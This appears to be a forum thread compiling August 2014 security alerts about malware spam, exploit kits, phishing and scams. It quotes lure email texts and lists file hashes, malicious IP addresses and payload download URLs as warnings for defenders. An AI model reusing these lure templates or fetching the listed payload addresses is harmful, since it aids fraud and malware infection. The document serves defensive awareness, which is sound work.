- http://myonlinesecurity.co.uk/ongoing-wordpress-attacks-exploiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URL's above.)
___

Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-august-22-2014-anti-fraud-secure-update-fake-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...

22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to 2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/81e695f628436a4850bec46b3f90906433a0d11ae163f298f48fae788362d29a/analysis/1408710186/

- http://threattrack.tumblr.com/post/95457720908/adp-anti-fraud-update-spam
22 Aug 2014 - "Subjects Seen:
ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0ce8b26a9ef99d5ebbb8f37a1f29e47d/tumblr_inline_napm4cGa8i1r6pupn.png

Malicious File Name and MD5:
2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)

Tagged: ADP, Upatre
___

"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/website-add-on-targets-japanese-users-leads-to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Number-of-Hits-by-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."

:fear::fear: :mad:

FYI...

My Photos SPAM - malware
- http://myonlinesecurity.co.uk/photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.

23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/8ef000f729f060a55aabaae7f16dc0e4da1108cdb8fef189dbafaa5b220b5ff0/analysis/1408799346/

zip .net / 200.147.99.195: https://www.virustotal.com/en/ip-address/200.147.99.195/information/
- http://quttera.com/detailed_report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."

ddns .net / 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
- http://quttera.com/detailed_report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___

Sony PlayStation Network taken down by attack
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic..."

- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."

:mad: :fear: :sad:

FYI...

Fake Invoice SPAM - PDF Malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-fake-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk, As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecurity.co.uk/invoice-951266-fake-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
WALSALL
MAHON RD IND EST. PORTADOWN
CO. ARMAGH BT62 3EH
T:028 3833 5316
F:028 3833 8453
Please find attached Invoice No. 3036 – 8340637
Best
Branch Manager
Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...

25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9b4e4ffb3943a08bc1c7b7bc7548aa5ce6e53375514081caf8d8973eadf5c87/analysis/1408955315/

** https://www.virustotal.com/en/file/cbd0a0fe8caa5e02e05ae196b89d3d1d1f6f680b00403add549b12356e2d8013/analysis/1408955404/
___

Fake Fax SPAM - pdf malware
- http://myonlinesecurity.co.uk/fax-arrived-remote-id-866-905-0884-fake-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretnding to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
A fax has arrived from remote ID ’866-905-0884′.
————————————————————
Transmission Record
Received from remote ID: ’866-905-0884′
Inbound user ID derek, routing code 669164574
Result: (0/352;0/0) Successful Send
Page record: 1 – 2
Elapsed time: 00:39 on channel 34 ...

25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37bbf261819afd6fabb75cb8815d4651e09329ab5cb8fe0b01d376096f195ab6/analysis/1408971894/
___

Bank of America Activity Alert Spam
- http://threattrack.tumblr.com/post/95740068388/bank-of-america-activity-alert-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4bf4d24ed5d86a6ec8c689e611edac36/tumblr_inline_navd12Tu861r6pupn.png

Malicious File Name and MD5:
report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)

Tagged: Bank of America, Upatre
___

Facebook Work From Home SCAM
- http://www.hoax-slayer.com/facebook-work-from-home-program-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slayer.com/images/facebook-work-from-home-program-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___

Fake ADP SPAM - PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-week-ending-08222014-invoice-447589545-fake-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It is generated from an unattended mailbox.

25 August 2014: invoice_447589545.zip (10kb): Extracts top invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/511aae72f63fd0256b7210d8a20afc75df7d1225ac054ec732a7fee43d11657b/analysis/1408992097/
___

BoA Merrill Lynch CashPro Spam
- http://threattrack.tumblr.com/post/95756978548/bank-of-america-merrill-lynch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
You have received a secure message from Bank of America Merrill Lynch
Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious URLs:
161.58.101.183/handler/jxpiinstall.exe

Malicious File Name and MD5:
securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f63cc48713e65cd81bd3d292795f917a/tumblr_inline_navorjRagN1r6pupn.png

Tagged: Bank of America, Merrill Lynch, tuscas

161.58.101.183: https://www.virustotal.com/en/ip-address/161.58.101.183/information/

:mad: :fear: :sad:

FYI...

Fake Vodafone SPAM
- http://blog.dynamoo.com/2014/08/vodafone-mms-service-malware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is not body text as such, the header reads:
From: Vodafone MMS service [mms813562@ vodafone .co.uk]
Date: 26 August 2014 12:00
Subject: IMG Id 813562-PictQbmR TYPE--MMS

The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/fe088d41e44b4c63ea6c4ed572f4537dc19265bddc56a567b61587b35819511d/analysis/1409051519/

** https://www.virustotal.com/en-gb/file/8aa74dba2e258b6965c8e3e68480ac5912f52fd85dc6c96839cce0c23123e776/analysis/1409052175/

192.254.186.106: https://www.virustotal.com/en/ip-address/192.254.186.106/information/
___

Phishers hook Facebook Users via SMS
- https://blog.malwarebytes.org/fraud-scam/2014/08/phishers-hook-facebook-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remains relevant to this date..."
* https://blog.malwarebytes.org/intelligence/2013/07/sms-scams-how-to-defend-yourself/

193.107.17.68: https://www.virustotal.com/en/ip-address/193.107.17.68/information/
___

Vacation SCAMS ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/leave-these-vacation-scams-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justtheflight.co.uk/blog/16-40-tourist-scams-to-avoid-this-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/magazines/48hrs/article/1574227/roam-alone-tips-single-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/this-stylish-jewelry-could-keep-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___

SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustotal.com/en/domain/stat-count.dnsdynamic.com/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
> https://www.virustotal.com/en/file/6082e26c223171124388ba2cf01e65840ef997863f42e418998d97e4fbcd6803/analysis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustotal.com/en/file/3fc9204595ccfacae5624653d96b95e60d25609f560e543054525ca2e56cb0b6/analysis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether is it part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustotal.com/en/file/5df51346ec3d96e781650488caaad85e64afbd2c45ca6228f7c6eddeb70de464/analysis/1408996125/

dnsdynamic .com - 84.45.76.100: https://www.virustotal.com/en/ip-address/84.45.76.100/information/

:fear::fear: :mad:

FYI...

Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo.com/2014/08/morupule-coal-mine-malware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
From: Madikwe, Gladness [GMadikwe@mcm.co.uk]
Date: 27 August 2014 10:43
Subject: Tax Invoice for Delivery Note 11155 dated 22.08.14
Hello ,
Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
Thank you
Regards
Gladness B Madikwe
Sales & Marketing Clerk
Morupule Coal Mine ...

Screenshot: http://1.bp.blogspot.com/-1wXuSVrxknQ/U_2vj2r9FGI/AAAAAAAAFVs/qn_Ls8u3nTM/s1600/moropule.png

Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustotal.com/en-gb/file/b1b121a0ef68b7abf628b4bdf10d583e6996c35a1888779e78d75c2907aebdf7/analysis/1409133512/
___

Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most common used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the times only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
Java .com
Deviantart .com
TMZ .com
Photobucket .com
IBTimes .com
eBay .ie
Kapaza .be
TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
198.27.88.157: https://www.virustotal.com/en/ip-address/198.27.88.157/information/
94.23.252.38: https://www.virustotal.com/en/ip-address/94.23.252.38/information/
178.32.21.248: https://www.virustotal.com/en/ip-address/178.32.21.248/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___

"Customer Statements" - malware SPAM
- http://blog.dynamoo.com/2014/08/customer-statements-malware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
Fom: Accounts [hiqfrancistown910@ gmail .com]
Date: 27 August 2014 09:51
Subject: Customer Statements
Good morning,attached is your statement.
My regards.
W ELIAS

Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustotal.com/en-gb/file/d4701c59264760f0d9a4e47cb9d7db9cb76445bf4f042c1d845ab5191f1cd689/analysis/1409135030/
___

Royal Bank of Canada Payment Spam
- http://threattrack.tumblr.com/post/95908793833/royal-bank-of-canada-payment-spam
Aug 27, 2014 - "Subjects Seen:
The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
The transfer is now complete.
Message recipient: The rating was not provided.
See details in the attached report.
Thank you for using the Service INTERAC Bank RBC Royal Bank.

Malicious File Name and MD5:
INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb4a2ec18d4a89785009fc1879506a92/tumblr_inline_nayu2cOUqn1r6pupn.png

Tagged: RBC, Upatre
___

AT&T DocuSign Spam
- http://threattrack.tumblr.com/post/95918175803/at-t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
Hello,
AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.

Malicious URLs:
79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2be088fa857d593c69b6a9644b1fec46/tumblr_inline_naz25ifIWp1r6pupn.png

79.172.51.73: https://www.virustotal.com/en-gb/ip-address/79.172.51.73/information/

Tagged: ATT, DocuSigin, Upatre

- http://myonlinesecurity.co.uk/please-docusign-document-contract_changes_08_27_2014-pdf-fake-pdf-malware/
27 Aug 2014
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/95917541998/adp-past-due-invoice-spam
Aug 27, 2014 - "Subjects Seen:
ADP Past Due Invoice
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here...

Malicious URLs:
81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/595fe50ab5e77ca2c29866eed0475ea8/tumblr_inline_naz1pmSD3h1r6pupn.png

81.80.82.27: https://www.virustotal.com/en-gb/ip-address/81.80.82.27/information/

Tagged: ADP, Upatre
___

Fake Payment Advice SPAM - PDF malware
- http://myonlinesecurity.co.uk/payment-advice-note-27-08-2014-fake-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Disclaimer:
This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
Cell 270 547-9194

27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)
Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55* . This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2423cecc3c6a33db524d3d067103f9685576c8d1317d7d279917de986057f9ba/analysis/1409154303/

:fear: :mad:

FYI...

The ‘Unknown’ Exploit Kit ...
- https://blog.malwarebytes.org/exploits-2/2014/08/shining-some-light-on-the-unknown-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_only.png
Flash only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Flash_only.png
Silverlight and Flash:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)

:fear::fear:

FYI...

Fake 'new photo' SPAM - malware
- http://myonlinesecurity.co.uk/new-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:

my new photo ..
if you like my photo to send me u photo

29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/e4c328815cc2840b53514e7bdcc43c83b29c0ae4676c755b4ee9587aa8c37db9/analysis/1409297373/
___

Netflix PHISH ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-netflix-site-wants-to-leave-you-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/phish1.png?w=564
